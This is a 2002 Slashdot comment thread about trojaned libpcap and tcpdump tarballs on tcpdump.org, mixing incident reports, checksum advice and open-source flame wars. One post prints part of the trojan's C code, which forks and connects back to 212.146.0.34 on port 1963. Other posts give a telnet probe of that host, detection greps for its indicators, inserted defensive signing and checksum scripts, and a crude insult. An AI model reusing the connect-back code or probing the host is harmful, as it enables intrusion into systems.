Trojan Found in libpcap and tcpdump
msolnik writes "Members of The Houston Linux Users Group discovered that the newest sources of libpcap and tcpdump available from tcpdump.org were contaminated with trojan code. HLUG has notified the maintainers of tcpdump.org. See our reports here or here."
What!? I didn't even know they were dating!
FP
... but great for Open Source.
Emerge doesn't get tcpdump source from tcpdump.org, but from ibiblio.org.
How did it get into tcpdump.org's sources exactly? The HLUG page isn't clear.
One of the flaws of open source in our current legal environment is that the ill intent of the authors of such malevolent code appears not to matter much. If there is no money involved, they get away with it.
I'd personally like to see them getting ass raped in a federal prison or the equivalent institution in a non-US locale. I'll keep dreaming.
HBI's Law: Frequency of calling others Nazis is directly correlated with the likelihood of the accuser being Communist.
apt-get update... : :-)
well, I have not installed these sniffing proggies, so it should be okay.
Now it could be worse
If you suspect your binaries to be trojanized, you'd want to sniff your own machine, but if (and it is the case) the sniffer is trojanized, then it could possibly hide such "activities"...
I actually read the article, and it seems, however, that this was not the case here...
phew
Trolling using another account since 2005.
Who would have thought that TCPDUMP would have crap like that in it?
And if I'm not mistaken, this happened before. Of course this is one of the biggest strengths of the Open Source Model.
Code is constantly audited, checked and corrected. If your closed source software has backdoors or trojans... well... who knows, but in Open Source it is easily detected.
Seems now more than ever the need to check the authenticity of your sources before installing.
As if security auditing wasn't a big enough headache already
-- If at first you don't succeed, lie!
Thats right, you have FAILED again. Worse, you were DEFEATED by an on topic post! Perhaps you should just give up and end this FAILURE of a life now.
I run a successful London-based dot com (yes, they do exist :) and we've been having to run around like headless chickens all day because of this.
Is it really too much trouble to do an MD4?
It's the one problem with the open-source community - there's no-one to pay me to pay my staff for the lost man-hours caused by this.
not really a good show for open source...
I mean, I love open source code, but does it seem that it is more susceptible to trojans being planted? I mean, any Tom, Dick and Harry can release code, and it may not be checked for things like this.
How about setting up an independent body of volunteers, who go through commonly used programs and check for this sort of thing. Then they can issue some kind of certification or "stamp of approval" on that particular release. That way, a user can at least tell that some basic source code scrutiny was done...
Any comments welcome...
So if you're like me, and you don't actually use the source code (just precompiled versions) then you've got no problem, right?
mirror 1 in italy mirror 2 in poland
blah blah blah... just don't feel like fscker dying all by itself. yadda yadda yadda, beowulf cluster hootie hoo, slashdot should cache unfta unf, I need head
It's not unusual at all in the Unix world. Pete's sake, K. Ritchie (he who invented Unix and C, or at least part of the team) put trojans into early versions of cc and login so that he could get access to _any_ unix system.
It worked with the trojaned compiler making bent versions of the login program. You couldn't detect it as if you compiled another version of cc or login from clean source the bent cc would infect that one and the cycle of infection continued. Very cleverly done.
Actually, for all you know maybe every version of gcc ever allows RMS and Torvalds into your box...
I swear, some of these source trees are worse than the canals of Venice.
Use them.
"I'd rather have a full bottle in front of me than a full frontal lobotomy"
The program connects to 212.146.0.34 (mars.raketti.net) on port 1963
With that information, I suppose that it is easy to find out which Finnish 'author' included the trojan, and would be simple to track him down. But my question is how something like this could have been included in an open source code and released to the general public?
-- 7 string electric violin + live loop samplers
This never used to happen. Now it is as if someone is intentionally trying their luck to trojan open-source projects. The crack0r types usually try to claim some kind of responsibility to increase their m0j0, but I haven't heard of anyone doing so. Usually a crack0r will try to make the trojaning *bad* to further make themselves feel better, but these trojanings are often in name only, and are of no real security threat. I am wondering if this is an anti-freesoftware publicity ploy by some individual or group.
What good having 'pure' source code minus viruses, worms and trojans? MS showed the way with some Korean CDs infested with bugs. Can penguins be far behind?
If you keep throwing chairs, one day you'll break windows....
there's no-one to pay me to pay my staff for the lost man-hours caused by this.
But then again, you had to pay no-one for the man hours you saved by using the open-source code.
K. Ritchie? Are you getting confused by the K&R book? It's D. Ritchie, if memory serves.
what about winpcap?
Either that or someone has trojaned (is that a word?) his site!
The trojan contacts the following website:
http://mars.raketti.net/~mash/services
DNS Details:
Registrant:
Kuopion Puhelin Oyj (RAKETTI2-DOM)
KUOPIO, 70780
KUOPIO,70780
FI
Domain Name: RAKETTI.NET
Administrative Contact, Technical Contact:
Siltakoski Petri (SP730-ORG) admin@DOMAIN.RAKETTI.NET
Kuopion Puhelin Oyj
Levasentie 23
KUOPIO
FINLAND
+358-17-302329
Fax- +358-17-3614904
Record expires on 07-Oct-2004.
Record created on 08-Oct-1998.
Database last updated on 13-Nov-2002 08:36:01 EST.
Domain servers in listed order:
NS1.RAKETTI.NET 212.146.0.10
NS2.RAKETTI.NET 212.146.0.11
From excellent karma to terrible karma with a single +5 funny post...
Seriously, though, I think the ideal solution would be to do multiple checks of the RC5 signature of newest packages, over several mirrors. The advisory mentioned that tcpdump.org was compromised, while the mirror at ibiblio.org was OK.
Or use Gentoo Linux. Of course. I can't do that, since I don't have broadband at home... =(
The right to offend is far more important than the right not to be offended. (Rowan Atkinson)
Isn't this one too many?
There was dsniff, BitchX, OpenSSH etc. and today tcpdump and libpcap?
Does anyone else think that someone has found a security hole in a popular unix daemon and is having some fun with it before notifying the authors. Or maybe there is a *VERY NASTY* exploit circulating privately?
At least that's what I think.
...could it be to search the repository for the insertion date?
so seeing as how there's no trojan cleaning program in linux, how does a person infected with the trojan rid his system of it? is it as simple as installing the non-trojan version?
I was just wondering how long these sources have been available with these many eyes making bugs shallow and so forth? I'm assuming it's less than 1 hour, because as I keep being told, everyone in the open source community checks all source code thoroughly before installing it, which is something that can't be done with closed source.
Somebody's been messing around there, don't you think?
Making trouble today for a better tomorrow...
the pages say the latest release(7.1) is vulnerable on some mirrors, but no mention is made of the libpcap-current tarball available on tcpdump.org
Sounds like a Texas conspiracy here!
Yeah! Let's nail his ass! ..
Oh wait, perhaps he's just the tech guy working for the company which registered the domain "raketti.net", Kuopion Puhelin. It's a telecom and net operator after all.
Think about this for a moment.
There is only one beneficiary if a trojan is successfully released in an Open Source project... and it's Microsoft.
Also, people should pay attention to where they get and how they distribute their source. It doesn't take much to generate an md5 checksum. Come on!
Just make sure you get your source from the source,
and check the source against your md5 checksum.
Not a big deal.
This is a local ISP, a telephone company.
The good blackhats have lots of compromised machines at their disposal, and are generally way too clever to leave such an obvious clue behind.
It's possible that this guy has something to do with it, but it's more likely that his machine is owned by the same person who managed to put the trojan out there.
...wait...never mind.
Donate background CPU time to fight cancer.
...that this little incident will not be mentioned in the next edition of the Cathedral and the Bazaar?
To make laws that man cannot, and will not obey, serves to bring all law into contempt.
--E.C. Stanton
Once again, Gentoo users wouldn't have had any problems, thanks to the wonderful portage system.
The trojaned code has been around for almost a year, from the project homepage (where most people would go for the source), and nobody spotted it.
It highlights the fact that a sizeable part of the open source user base either can't read code, or don't want to.
Yes and no. The information you have successfully received from the Whois database is pointing to the phone company in Finland, which happens to be a host for raketti.net domain. Petri Siltakoski is just an administrative contact of the ISP (Raketti.Net). He has nothing to do with the web page set up by an individual who seems to have an account in this ISP.
Siltakoski Petri is apparently just the guy who registered that domain. It could be that a user from that domain is involved or, as you said, that server has been r00ted. Funny, though, http://mars.raketti.net/~mash/services is nothing but a FreeBSD /etc/services file.
-- Never hit a man with glasses. Hit him with a baseball bat.
This was just sent ~1 min ago:
To : msolnik@hlug.org
Cc : wt-changes@wiretapped.net,
tcpdump-workers@tcpdump.org,
mcr@sandelman.ottawa.on.ca
Subject : tcpdump.org mirrors
----- Message Text -----
Hi guys,
I run the main mirror of tcpdump at wiretapped.net (no relation to wiretapped.us) in Australia. We rsync from cvs.tcpdump.org, and have removed the entire tcpdump.org tree and disabled rsync updates until we hear from Michael Richardson at tcpdump.org.
You may like to add this info to your Updates area, as the unavailability of the main mirror site may seem suspicious. It is not, as described above.
Because wiretapped.net itself is mirrored to a few other sites, it may take between 1 hour and 24 hours for this removal (and any subsequent re-addition) to take effect. We'll note when it goes back online at http://www.wiretapped.net/changelog.html
Hope this assists in preventing any further spread,
Grant
www.wiretapped.net
I admit to not knowing a lot about open source development, not being a developer myself. But I'm curious, is there any sort of legal accountability when someone intentionally codes a trojan into a piece of software? Is it possible to keep track of who is writing what code? When trojans, etc, are discovered, are you limited to just patching them and going from there, or is it usually possible to find out who did it and therefore be suspect of future code?
Buy the President
I have just started using Gentoo and have not finished reading through the docs yet. As such, I am unaware of how this problem would be avoided using Portage. Now if you referring to rolling back, then I understand that...
Who says geeks don't have condoms?
Or maybe not..
The whole Raketti.net seems to be a domain for a local telecom/ISP based in Kuopio, Finland (smallish town in east Finland). Petri Siltakoski is just probably their Admin.
They seem to be offering internet access with space for homepages, so Petri Siltakoski doesn't necessarily have to have anything to do with this..
touch -t 200112101200 newbie.c
I thought the whole idea of the GPL was that you could take a program and modify it to your own needs so long as you release the source back to the community under the same license.
Sounds like that's what happened here!
Two paths to greatness... that which slowly climbs to the top of the summit, with all its grueling hard work and requirement of tenacity and patience. Then there is the fast and easy way of being shot up by a cannon. Unfortunately for many you will knock much of the mountain and its traversers off, unfortunately for you what comes up must come down.
Beware the venture captalist, as he seeks to aim only at the short term then cash in and run like hell.
It isn't only a services file, if you scroll down you will find also some c source, which will be compiled on the fly.
The trojan code seems somewhat complex and unreadable at first glance. The variable names don't express much of the semantics. It doesn't even have any comments. No wonder no one notices if this kind of stuff is written into code. And this is very clear code.
Well, ok, crackers probably want to obfuscate their code with /* Here's stuff for the trojan. */, but if all code is well documented, it's generally easier to understand and intentional obfuscation might be easier to spot.
Even (or especially) free software developers should use more descriptive variable names and comment their code well. It makes the code much more readable for analysis, both security or quality reviews.
I'd recommend the rule: "One comment per statement, except when really unnecessary." Many people think it's silly, but those people haven't had to read a lot of other people's code.
Hmm, I wonder why they used port 1963...author's birth year? Nah, that would be too old for a typical cracker.
When I first started to use open source software (back in '93), I always wondered how easy it would be to release compromised sources, whether intentionally or not.
Once I got into it, hey, I trusted these guys. They were the good guys. We were the good guys. The community was built on trust, and it worked.
We used to scoff when we heard about the trojans in the latest version of Microsoft Word. That would never happen to us... unless they sorted that WINE [wine.org] project out. ;-)
Now we face the same issues. As source distributions (I'm not discounting binary distributions - if you trust RedHat, that's your call) increase in popularity, this will become more of a problem.
We need to tighten up the procedures that we use. We need to ensure that the software we put out is the software that the users download and use. We need to ensure that nobody can compromise our systems in this way.
Any fool can talk, but it takes a wise man to listen.
Dude? WTF is up with all these trojans recently? And why in the hell are the AUTHORS putting them in now? I know. It must be so they can send money to all their users. It couldn't possibly be devious. Everyone knows that all open source coders are God's greatest creations and deserve their own temples of worship, though nobody is to be worshiped above Linus. At least with Windows I don't have to worry about this, as if there are trojans I don't know about them. That way they don't affect me. Also, I'm not a communist hippie, so the government won't be tracking my movements. All I do is whack off to porn, much like the rest of the crowd here. But I do bathe ever day, so I guess that's something unique about me. I also think Nethack is HIGHLY over-rated. Also, a lot of you guys hate the MPAA, but still buy the fucking 4-DVD special edition set of Lord of the Rings (also known as "Some Queer Looking Guys Who Buttfuck Each Other Between Scenes." That about sums it up for now. I want to be a troll, but I'm just not dedicated enough.
Also feel free to telnet into mars.raketti.net port 1963 a couple hundred times (it returns M the first time and nothing after that).
Does anyone else have an issue with tcpdump.org NOT mentioning there sources were trojaned? It seems there should be some mention of "Hey if you trusted us and didn't verify checksums, you might want to..."
I really wonder how long it (the Trojan) has been in before anyone read the code discovered it.
... where were you wanking, didn't all of you read every f...g line of that program?
... whatever flame fire that remark may start!!! (instead of flaming, look at yourselves in the mirror and admit how sometimes your attitude is ridiculous considering computer)
Hey Slashdotters, you bunch of "I know better than you" people
HA HA!!!
This is just showing that the Open Source "Community" is not more immune than any other to that kind of intrusion
The reason this is a problem is that nebulous shrug of an answer to the question "Who are you trusting to provide this code which you execute?" It could be an anonymous PGP/GPG key, but to violate people's trust would mean that trusted token is no longer trusted, and thus it would identify the other risks out there.
Imagine the tcpdump distributions were signed by an anonymous key. We could look over the code, and decide to trust that key. Later, people would be able to tacitly trust that key to sign tcpdump tarballs. One day, the tcpdump code will fail to match the signature: it will be caught before being executed, and the trojan will be discovered quickly. Later, another trojan will appear, but the signature will match. A few people will be bit, but the key will be exposed and others will be able to quickly identify their risk.
At the VERY LEAST, use MD5 sums on the files like FreeBSD ports!
--- Nothing clever here: move along now...
the article is called 'reflections on trusting trust' and Ken Thompson wrote it upon inception of the ACM distinguished scientist award. now, we all know you are full of shit (since you can't even spell his name right) but claiming that 'each version of login was compromised' is so far off base that it's not even funny.
follow the link posted already, read it and try to understand what he fundamentally tries to tell you. then go and read aleph1's 'smashing the stack for fun and profit' and try to get a glimpse of what 'hacking' was considered in the 80s.
sources that debian built these packages from have good checksums
rgoldber@supercomputer:~$ md5sum tcpdump_3.6.2.orig.tar.gz
6bc8da35f9eed4e675bfdf04ce312248 tcpdump_3.6.2.orig.tar.gz
rgoldber@supercomputer:~$ md5sum tcpdump_3.7.1.orig.tar.gz
03e5eac68c65b7e6ce8da03b0b0b225e tcpdump_3.7.1.orig.tar.gz
rgoldber@supercomputer:~$ md5sum libpcap_0.7.1.orig.tar.gz
0597c23e3496a5c108097b2a0f1bd0c7 libpcap_0.7.1.orig.tar.gz
that's not true, look at it again ...
/. eats this code post ... ):
/dev/null 1>/dev/null
in the middle of the fully commented services file, you find (let's hope
#!/bin/sh
cat >conftes.c
/* the header names inside the #include <...> lines were eaten by the
   comment filter; restored here from the calls the code below makes */
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <stdlib.h>
#define XOR_KEY 0x89
int main (int argc, char **argv)
{
    char c;
    int s, x, sv0[2], sv1[2];
    struct sockaddr_in sa;
    /* detach: the child carries on, the parent exits */
    switch (fork ()) { case 0: break; default: exit (1); }
    close (0); close (1); close (2);
    do {
        if ((s = socket (AF_INET, SOCK_STREAM, 0)) == (-1))
            exit (1);
        /* connect back to 212.146.0.34 port 1963, giving up after 10 s */
        sa.sin_family = AF_INET;
        sa.sin_port = htons (1963);
        sa.sin_addr.s_addr = inet_addr ("212.146.0.34");
        alarm (10);
        if (connect (s, (struct sockaddr *)&sa, sizeof (sa)) == (-1))
            exit (1);
        /* read a single byte from the server; the post is cut off here */
        if ((x = read (s, &c, 1))
nice, isn't it?
heheh
discussion site discourages discussion shocker
This apparently misleading (albeit well-intentioned) comment gets modded +4 interesting, meaning that almost everyone will see this poor guy's name.
All the replying posts pointing out that it's a phone company/ISP and it's almost certainly nothing to do with this chap are at 2 or below, meaning that many people won't see them and this individual's name is now besmirched.
And, by the way, this happens all the bl**dy time on /. An early poster makes assumptions and gets modded way the hell up, then all the rebuttals pointing out he's talking out of an unreliable orifice wallow in the low point range.
Yeah, I know it's off-topic. Just wanted to rant about something that irritates me. Return to your normally-scheduled bits and pieces.
Look more closely -- right in the middle of the file is C source code for the trojan.
hmmm of course /. didn't eat it completely. but go and look for yourself for the full code.
they were practicing safe sex
well, I have not installed these sniffing proggies, so it should be okay.
Darn... apt-get even makes your box more secure than before even if you haven't actually installed the bad packages? This must be the Holy Grail! And it should be okay? Not only that you have not installed tcpdump and libpcap, which definitely makes it okay, you don't even trust apt-get to really solve your (non-existing) problem... Now I wanna join the apt-get cult... Where can I register?
I bet you recommend penicillin over other medicine even when you got no infection! Or do you use apt-get then as well? Doesn't make any difference anyway...
(For the record: I use Debian GNU/Linux among other stuff...)
Does anyone know if the RedHat binaries are ok?(7.3/8.0)
This was quite a disillusion for me. I feel so dirty. Gonna take a long shower.
Because I used the current tar ball Friday afternoon and it shows no sign of the trojan.
Do this: Download gpg from gnupg.org. Build it. Generate yourself a key. Try to get some of your friends to sign it. submit it to keyserver.net. Sign your code with that key. While you're at it, start using kmail, evolution, or mozilla with enigmail and start signing your emails too. Do it religiously.
Check sigs when you download code too.
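The sign-and-verify routine described in the post above, as an added example that is not from the thread, from tcpdump.org or from GnuPG's own documentation. It also covers the key-replacement case raised later in the thread: the user side pins the maintainer's primary-key fingerprint the first time a signature verifies, so a later swap of both the key and the tarball on the download site is caught. It assumes GnuPG 2.1 or newer; the key names, addresses and file names are made up for the demo.

```shell
#!/bin/sh
# Added example, not code from the thread or from tcpdump.org.
# Signs a release tarball with GnuPG, pins the signer's primary-key
# fingerprint the first time it is seen, and rejects later downloads
# whose signature is missing, bad, or made by a different key.
# Assumes GnuPG 2.1+; user ids and file names below are invented.

# Throwaway keyring so the demo never touches ~/.gnupg.
make_keyring() {
    GNUPGHOME=$(mktemp -d)
    export GNUPGHOME
    chmod 700 "$GNUPGHOME"
}

# Generate an unprotected signing key for USERID (demo only; a real
# maintainer key gets a passphrase and lives on the maintainer's box).
make_key() {   # make_key USERID
    gpg --batch --quiet --pinentry-mode loopback --passphrase '' \
        --quick-generate-key "$1" default default never 2>/dev/null
}

# Primary-key fingerprint for USERID, the value a pin file stores.
key_fingerprint() {   # key_fingerprint USERID
    gpg --batch --with-colons --list-keys "$1" 2>/dev/null |
        awk -F: '$1 == "fpr" { print $10; exit }'
}

# Maintainer side: detached, ASCII-armoured signature next to the file.
sign_release() {   # sign_release FILE USERID
    gpg --batch --yes --quiet --pinentry-mode loopback --passphrase '' \
        --local-user "$2" --armor --detach-sign --output "$1.asc" "$1" 2>/dev/null
}

# User side: succeeds only if FILE.asc is a good signature over FILE and
# the signing key's primary fingerprint equals the one in PINFILE.
# The first good verification writes the pin (trust on first use); get
# the fingerprint out of band (mailing list, keysigning) when you can.
verify_pinned() {   # verify_pinned FILE PINFILE
    fpr=$(gpg --batch --status-fd 1 --verify "$1.asc" "$1" 2>/dev/null |
          awk '$1 == "[GNUPG:]" && $2 == "VALIDSIG" { print $NF; ok = 1 }
               END { exit !ok }') || return 1
    if [ ! -f "$2" ]; then
        printf '%s\n' "$fpr" > "$2"
    fi
    [ "$fpr" = "$(cat "$2")" ]
}

demo() {
    make_keyring
    make_key 'Example Maintainer <maint@example.invalid>'
    make_key 'Tom Blackhat <tom@example.invalid>'
    work=$(mktemp -d)
    tarball="$work/tcpdump-3.7.1.tar.gz"
    printf 'constructed stand-in for the release tarball\n' > "$tarball"

    sign_release "$tarball" maint@example.invalid
    verify_pinned "$tarball" "$work/pin" && echo "1. genuine release: accepted, pin written"

    printf 'x' >> "$tarball"                       # tampered after signing
    verify_pinned "$tarball" "$work/pin" || echo "2. tampered tarball: rejected"

    sign_release "$tarball" tom@example.invalid    # re-signed with an impostor key
    verify_pinned "$tarball" "$work/pin" || echo "3. valid signature, wrong key: rejected"
}
case "${1:-}" in demo) demo ;; esac
```

Run it as `sh sign-verify.sh demo`. Case 3 is the one a bare `gpg --verify` does not catch: the impostor's signature is cryptographically fine, and only the pinned fingerprint tells you it is the wrong signer. The pin file is the part that must not sit on the same host as the tarball.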
Slackware 8.1 was released this past summer, so I'm wondering whether its tcpdump-3.7.1-i386-2 is infected.
Can anybody tell me whether checking for "mars", "mash" etc. in the output from "strings tcpdump" or "strings libpcap.a" is sufficient to show evidence of the trojan?
..that would actually be Petri Siltakoski and not the other way around..
The posted MD5's for libpcap and tcpdump indicates that at least the sunfreeware version is OK.
http://www.sunfreeware.com/md5.html
What does the article imply with "ADM. Hmmm..."?
...as a rocket scientist I feel most compelled to answer (cid=4658776)
(cid=4658433)
(cid=4658097)
(cid=2238414)
(cid=2207372)
(cid=2204471)
(cid=2204422)
http://slashdot.org/comments.pl?sid=44937
...I run a successful London-based dot com
http://slashdot.org/comments.pl?sid=44933&ci
... As a lawyer myself, I can state that
http://slashdot.org/comments.pl?sid=44912&c
... I'm an avid open-source supporter
http://slashdot.org/comments.pl?sid=21
...I am an avid supported of the open-source movement [sounds familiar? that's because it is -ed]
http://slashdot.org/comments.pl?sid=20824&c
...I'm an avid supported of the open source movement [we know -ed]
http://slashdot.org/comments.pl?sid=20761&c
... I am a passionate supported of the open-source movement [geez -ed]
http://slashdot.org/comments.pl?sid=20760&c
Enjoy your job, make lots of money, work within the law. Choose any two.
irssi
fragroute, dsniff, fragrouter
BitchX
This message says Recently there have been a spate of well publicized attacks against what I would consider to be the backbone of the open source movement - its source code distribution system. Hackers have been penetrating people who download, say, OpenSSH and then compile it to use on their systems by trojaning OpenSSH itself. This strikes at the very HEART of Open Source by making the act of installing the software a weakness. Because Open Source has no one distribution point, there are many places for someone to verify if they want to install software securely. Because there are no vendors, the sites people download software from are usually not provided with a dedicated security staff.
This is serious, guys and gals. Use the source, Luke - but what if I can't trust the source any more? Open Source has to find a method to get around this problem; see this post.
"There are already a million monkeys on a million typewriters, and Usenet is NOTHING like Shakespeare." - Blair Houghton
I'm just typing out loud here.
Yes, there'd almost certainly have to be a cost associated with this, and I'd think it would be paid by the people who wanted source code, but didn't want to have to worry about checking it for Trojans etc..
The source could still be publically available for comment and review to add to those being paid to perform the analysis.
Seems like this might be a good service, once the idea is fleshed out more...
There'd also need to be some definition of "guaranteed" (or maybe just a different word :0) that fit this scenario, most people don't want to set themselves up to be sued.
Give a hand, not a hand-out.
Note that THE DATE ON THE FILE DOESN'T MATTER. It was trojaned last night, not last year.
The fact that someone so ineptly trojaned the source, not even bothering to generate a new md5sum, suggests that it's someone out to make it obvious looking. Someone who has a reason to discredit open source. Someone like a former script kiddie employed by microsoft...
Never mind that russian crackers were wandering round MS servers for MONTHS back in 2000...
All it does it retrieve a /etc/services file from that website.
Heh, I had only looked at the first few lines or so, and didn't think anything of it. Did anyone look in the parent directory from where that services file is? Or if the trojan gets any other files besides services?
-- Never hit a man with glasses. Hit him with a baseball bat.
I downloaded and installed (On a customer's machine even!) the file http://www.tcpdump.org/release/libpcap-0.7.1.tar.gz back on October 24th (The link still shows up in the "visited" color in my browser even). My md5sum is 0597c23e3496a5c108097b2a0f1bd0c7, and inspection of the config script and gencode.c show no signs of the evil code.
So the trojan'd version has not been sitting there too long.
Having source code freely available doesn't imply security. Ken Thompson demonstrated this very eloquently in his paper.
I'm telling you, this is Microsoft's new tactic for attacking open source. Make people afraid of it, and they will run in terror.
Scary, very scary.
In the meanwhile, I suggest that you run all your untrusted software in a sandbox like Systrace which is available for the BSDs and Linux.
This screenshot shows Dug Song detecting the trojan in the Fragroute distribution. Systrace allows you to run completely untrusted applications in a sandbox. The security policy is created on the fly with the user deciding what an application is allowed to do.
We need to be much more careful about the software that we run.
login as root (or whoever can run tcpdump)
tcpdump -n host 212.146.0.34 &
telnet 212.146.0.34 1963
if tcpdump sees the connection, then it isn't ignoring port 1963; if you don't see the connection, then your tcpdump is ignoring port 1963
and well, it's always nice to /. your local rooted base.
the people at 212.146.0.34 should change it to something like /usr/bin/tcpd echo 'A' (i think that was the quit code)
if this test is wrong, well, so be it, i'm still new at this linux thing, but i'm better at linux than i am at spelling (boy, i should be an /. editor)
--Anonymous Coward
I moved the binaries on the tcpdump.org web site, so that the "download" links won't work.
"ls -c" says that the modified binaries were installed at Nov 11 10:14:00 2002 GMT.
Preliminary inspection says that the CVS repository is O.K.
What you're saying is perfectly valid, but what if I use common sounding variable names to make it appear as if I was doing something I wasn't? Even with MOST good programmers, they aren't ever trained to debug code in this manner (I know a few CS exams do, for sure, but I have NEVER seen a huge project train people for this).
How about this:Lets start a few grassroots projects (doesn't matter how many) and work on educating people to read obfuscated code. Identify when strtok, fopen, etc etc is and is not doing harmful things to data - when it may indeed be doing something nefarious.
I started a site myself here to help myself start explaining simple stuff.. and eventually will work up to writing drop-in replacement libraries for other programs, or perhaps ways to trojan executables in memory you might have control over (ptrace?).
Lets all learn a bit, and share the knowledge.
[plug]Damn my sig makes strange sense now[/plug]
"During times of universal deceit, telling the truth becomes a revolutionary act" -- George Orwell
Interesting that there is no mention of this on the tcpdump.org website, one would think they would at least post something about it.
Don't think for a second that Microsoft hasn't put back
Microsoft *have* inserted a backdoor into the CryptoAPI for the NSA.
I know this is a stupid question but I don't understand how this ended up in the distribution in the first place.
To ensure perfect aim, shoot first and call whatever you hit the target
You are partially correct.
If you download the author's public key today when you install widget 2.3 and tomorrow Tom Blackhat replaces both the author's public key and places a trojaned widget 2.4, you will catch it when you do the upgrade because you got the legitimate key prior to its replacement. Only new downloaders will be screwed.
Obviously it is still better to place the public key in a secure location separate from the files but there is some use to the key system even if the key is replaced later.
Coding Blog
This isn't the first post of this type of thing with open source and I've always wondered if it's a big deal when I see them.
But I think I finally get the difference between Closed Source and Open Source with regards to evil code:
Closed Source with Intentional Evil Code = Law Suit
Open Source with Intentional Evil Code = Tough Luck
I know the rebuttal is - "with open source, you can find the evil code, you have more eyes looking to find that evil code" but as it has been noted in this thread, how long has it been there? A year, more? Plus look at the number of almost anonymous (if not completely anonymous) contributors to the code. Closed Source doesn't have that liability.
Sorry but this one goes grudgingly to the Closed Source win column.
I downloaded and installed libpcap and tcpdump on Nov 1. The versions I have came from tcpdump.org. md5sum shows that they have the correct checksum and not the trojaned checksum as reported on the Houston LUG page. A grep of the sources for the port number and ip found in the trojan reports null. It looks like the trojan files were placed on tcpdump.org after Nov 1, 2002.
FreeSpeech.org
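The two checks in the post above (compare the tarball's md5sum with a known-good value, then grep the sources for the IP and port) as one script. This is an added example, not code from the thread, from HLUG or from tcpdump.org. The one caveat it bakes in: the expected digest has to come from somewhere other than the site you downloaded from (a second mirror, a distribution's package metadata, a list announcement), because whoever can replace the tarball on tcpdump.org can replace the sum posted next to it. The sample trees and file contents are constructed for the demo; the indicators are the ones quoted in this thread.

```shell
#!/bin/sh
# Added example, not code from the thread or from tcpdump.org.
# Checks a downloaded tarball against an MD5 obtained from an independent
# source, then greps an unpacked tree for the indicators quoted in this
# thread.  File names and sample contents below are constructed.

# MD5 of a file on GNU (md5sum) or BSD/macOS (md5) userland.
file_md5() {   # file_md5 FILE
    if command -v md5sum >/dev/null 2>&1; then
        md5sum "$1" | awk '{ print $1 }'
    else
        md5 -q "$1"
    fi
}

# Succeeds only if FILE's digest equals EXPECTED.  EXPECTED must come from
# a place the tarball's replacer could not also rewrite; a sum served next
# to the file on the same host proves nothing.
check_md5() {   # check_md5 FILE EXPECTED
    [ "$(file_md5 "$1")" = "$2" ]
}

# Number of lines under DIR carrying an indicator from this incident: the
# connect-back address, the port as it appears in the dropped C source,
# the temp file the configure script writes, or the host the services
# file was fetched from.  Prints 0 for a clean tree.
scan_tree() {   # scan_tree DIR
    grep -rE '212\.146\.0\.34|htons \(1963\)|conftes\.c|mars\.raketti\.net' "$1" 2>/dev/null |
        wc -l | tr -d ' '
}

# Two small trees for the demo: one clean, one with the configure-script
# fragments quoted in the thread (constructed, not the real trojan).
make_sample_trees() {   # prints the parent directory
    top=$(mktemp -d)
    mkdir -p "$top/clean" "$top/bad"
    printf '#!/bin/sh\nexec ./config.status\n' > "$top/clean/configure"
    printf '#!/bin/sh\ncat >conftes.c\n' > "$top/bad/configure"
    printf 'sa.sin_addr.s_addr = inet_addr ("212.146.0.34");\n' >> "$top/bad/configure"
    echo "$top"
}

demo() {
    top=$(make_sample_trees)
    printf 'hello' > "$top/libpcap-0.7.1.tar.gz"   # stand-in tarball, md5 of "hello"
    if check_md5 "$top/libpcap-0.7.1.tar.gz" 5d41402abc4b2a76b9719d911017c592; then
        echo "tarball digest matches the independently obtained sum"
    else
        echo "DIGEST MISMATCH: do not unpack"
    fi
    echo "clean tree: $(scan_tree "$top/clean") hit(s)"
    echo "bad tree:   $(scan_tree "$top/bad") hit(s)"
}
case "${1:-}" in demo) demo ;; esac
```

Run it as `sh check.sh demo`; in real use call `check_md5 libpcap-0.7.1.tar.gz <sum from a second source>` before unpacking and `scan_tree libpcap-0.7.1` after. A grep for a bare `1963` would also hit copyright dates, which is why the port is matched as it appears in the dropped C source.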
When was the last time Microsoft paid you when a security hole was found in their product. YOU should have got your admins to verify the checksums before installation. The parent poster is a troll
MD5 checks work nicely. Sure pgp in theory is better but since md5's are cached locally, and a helluva lot faster to check the chances that they will actually be used and verified are seemingly quite good.
Which is to say in practice MD5 has caught rather a lot of these problems, and in quite timely manner.
As irrelevant as various source-distributions (e.g. lunar, source-mage and Gentoo) are at present in other respects, they make a nice 'canary' in the coal mine :-).
Linux is Linux, if One need clarify their dist: <Dist>/GNU Linux
bsds are of course just BSD
I don't mean to troll (and I hear you say "yeah but you are") BUT quite a few project sites seem to have been infused with trojaned downloads over the last few months. Actually makes you think if there is a certain person or organization behind this? Considering the fact that news like this give these projects a bad security reputation, which counter-balances the built-in security breaches of a certain commercial software giant just nicely. Just a paranoid thought, don't take it too seriously though (I know you won't but still).
FreeBSD (don't know about other BSDs) stores the checksums either locally when installing the ports collection or on another server, just like Gentoo.
Nah probably not...
Strange women lying in ponds distributing swords is no basis for a system of government.
That's why we need a new moderator point:
-1 Caps Lock Title
"All the replying posts pointing out that it's a phone company/ISP and it's almost certainly nothing to do with this chap are at 2 or below, meaning that many people won't see them and this individual's name is now besmirched."
And, by the way, this happens all the bl**dy time on /. An early poster makes assumptions and gets modded way the hell up, then all the rebuttals pointing out he's talking out of an unreliable orifice wallow in the low point range.
You mean like yours?
and it's not the only one found today, nor in the past week... good to see that slashdot is finally reporting on this stuff.
To all those who think Linux is safe and secure... guess again. It's just that you guys spend more time writing viri and looking for 'sploits' in MS code than MS code jockeys do with Linux... until now. That and the 9 to 1 ratio of users.
Isn't read-only hardware the simplest answer for this kind of attack?
If the files are coming from a CD-R, there's no trojan. Period.
Of course CD-Rs are too small for many sites. How practical is it to write-protect a HD?
Question: Since this guy is identifiable..why not have Finnish govt. start looking with him. (Of course, I realize that he may not be the actual perp...but...)
Did those virii come distributed with the product? Now you're going to tell me there are ABSOLUTELY NO possible security holes in open source software, ever right? Go on...
Ignoring the fact that installing certain operating system components is often worse for your computer than a virus (by installing this service pack, we may enter your computer)...
Nothing is 100% secure, and nobody ever said linux is (or not anyone intelligent, anyways). However, tallies of response time when a breach is found, and often the time in finding such a breach, are the factors at hand. You'll certainly not see MS yelling out "hey, we were hacked, check your software people," but instead something more like a quiet, um... something wrong... here patch... you fix.
And yes, lots of MS tools come with bugs in them that leave your computer so open that you might as well just invite half the web for a party. Once MS gets the patch out, if you're a decently intelligent admin/user, you can fix things up to plug the hole, or meanwhile just disable affected components, etc.
